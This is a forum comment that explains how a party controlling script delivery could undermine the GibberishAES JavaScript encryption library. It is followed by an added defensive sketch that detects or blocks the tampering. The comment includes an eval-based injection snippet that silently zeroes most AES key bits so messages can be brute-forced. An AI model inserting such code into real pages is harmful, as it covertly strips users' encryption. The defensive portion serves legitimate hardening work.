by ryan-c 4764 days ago
There are 64 bits of randomness (however, they come from Math.random which is not so good...).

The encrypted text produced by this has a distinct signature - all messages will contain "U2FsdG". Here's how we break this if you're Google/can force Google to do stuff:

1) Detect messages containing that OpenSSL 'magic number'

2) If detected, push something like this:

    // Should check to see if GibberishAES exists to avoid errors if it doesn't...
    // Grab target function as a string
    var keycode = '' + GibberishAES.openSSLKey;
    // Inject something evil
    keycode = keycode.replace('key = result.slice(0, 4 * Nk);','key = result.slice(0, 4 * Nk); for (var pos = 1; pos < 4 * Nk; pos++) { result[pos] = 0; };');
    keycode = 'EvilGibberish = {}; EvilGibberish.openSSLKey = ' + keycode;
    // Execute the modified code to generate the new object
    eval(keycode);
    // Replace the 'good' keygen routine with the 'evil' one
    GibberishAES.openSSLKey = EvilGibberish.openSSLKey;

This will zero all but the first 32 bits of the AES key, allowing easy brute forcing.

Note that this is based on something I wrote for a CTF, and I haven't tested it specifically against GibberishAES, but the technique works.
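
Added example, not part of the original comment and not GibberishAES code: a defender-side sketch showing that replacement-by-assignment of a key-derivation function, as in the snippet above, is detectable by comparing function identity against a load-time snapshot and is blocked by `Object.freeze`. `makeLib`, `snapshot`, `tampered`, `tryReplace` and `demo` are hypothetical names, and the sketch assumes the defending code runs before any hostile script and keeps its snapshot private.

```javascript
// Hypothetical stand-in for a crypto library object; not GibberishAES itself.
function makeLib() {
  return {
    openSSLKey: function (passBytes, salt) {
      // Placeholder body; a real library derives key and IV here.
      return { key: passBytes.concat(salt), iv: salt.slice() };
    }
  };
}

// Record the identity of every function property at load time.
function snapshot(obj) {
  const snap = new Map();
  for (const name of Object.keys(obj)) {
    if (typeof obj[name] === 'function') snap.set(name, obj[name]);
  }
  return snap;
}

// Return the names whose current value is no longer the recorded function.
function tampered(obj, snap) {
  const bad = [];
  for (const [name, ref] of snap) {
    if (obj[name] !== ref) bad.push(name);
  }
  return bad;
}

// Attempt the same kind of assignment the comment describes; true if it took effect.
function tryReplace(obj, name, fn) {
  try { obj[name] = fn; } catch (e) { /* TypeError: frozen object, strict mode */ }
  return obj[name] === fn;
}

function demo() {
  const substitute = function () { return { key: [0], iv: [0] }; }; // constructed stand-in
  // Case 1: ordinary object. The swap succeeds but the snapshot reveals it.
  const open = makeLib();
  const openSnap = snapshot(open);
  const replacedOpen = tryReplace(open, 'openSSLKey', substitute);
  const detected = tampered(open, openSnap);
  // Case 2: frozen object. Properties are non-writable and non-configurable.
  const locked = Object.freeze(makeLib());
  const lockedSnap = snapshot(locked);
  const replacedLocked = tryReplace(locked, 'openSSLKey', substitute);
  const lockedClean = tampered(locked, lockedSnap).length === 0;
  return { replacedOpen, detected, replacedLocked, lockedClean };
}
```

Freezing does not help against a party that serves the library itself, since a modified copy can be delivered before any check runs.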